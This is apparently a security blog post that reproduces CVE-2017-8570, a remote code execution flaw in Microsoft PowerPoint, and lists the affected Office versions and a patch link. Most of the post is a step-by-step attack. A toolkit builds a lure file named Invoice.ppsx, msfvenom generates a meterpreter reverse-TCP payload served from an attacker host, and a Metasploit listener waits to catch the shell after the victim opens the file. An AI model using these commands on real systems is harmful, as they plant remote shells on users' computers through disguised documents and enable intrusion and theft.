CVE-2017-8570 repeat | LSABLOG

首页 » NetworkSec » AWD » 正文

CVE-2017-8570 repeat

0x01.Overview

In July 2017, Microsoft fixed multiple Microsoft Office vulnerabilities,including the cve-2017-8570 vulnerability which is a logical vulnerability,it is easy to use and simple,and the vulnerability is a remote code execution vulnerability for Microsoft Office.

The reason for this is that Microsoft PowerPoint will initialize the “script” Moniker object when it is executed, while the object will be activated during the presentation of the PowerPoint animation, and the SCT (script Component file) will be executed. An attack can trick a user into running a powerpoint file containing the vulnerability that results in obtaining the same executive permissions as the current logon user.

0x02 Influence

Microsoft Office 2007 Service Pack 3

Microsoft Office 2010 Service Pack 2 (32-bit editions)

Microsoft Office 2010 Service Pack 2 (64-bit editions)

Microsoft Office 2013 RT Service Pack 1

Microsoft Office 2013 Service Pack 1 (32-bit editions)

Microsoft Office 2013 Service Pack 1 (64-bit editions)

Microsoft Office 2016 (32-bit edition)

Microsoft Office 2016 (64-bit edition)

0x03 Bug repeat

Step1:

python cve-2017-8570_toolkit.py  -M gen -w Invoice.ppsx -u http://attackerip/logo.doc

Step2:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=4444 -f exe > /tmp/shell.exe

Step3:
python cve-2017-8570_toolkit.py -M exp -e http://attackerip/shell.exe -l /tmp/shell.exe

Step4:
msfconsole

use multi/handler

set payload windows/meterpreter/reverse_tcp    //设置Payload

set LHOST attackerip

run

Step5
Double click Invoice.ppsx in victim that you can get a meterpreter.

0x04 Repair

Get the patch from MS : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570

0x05 Reference

http://www.ichunqiu.com

 

Comment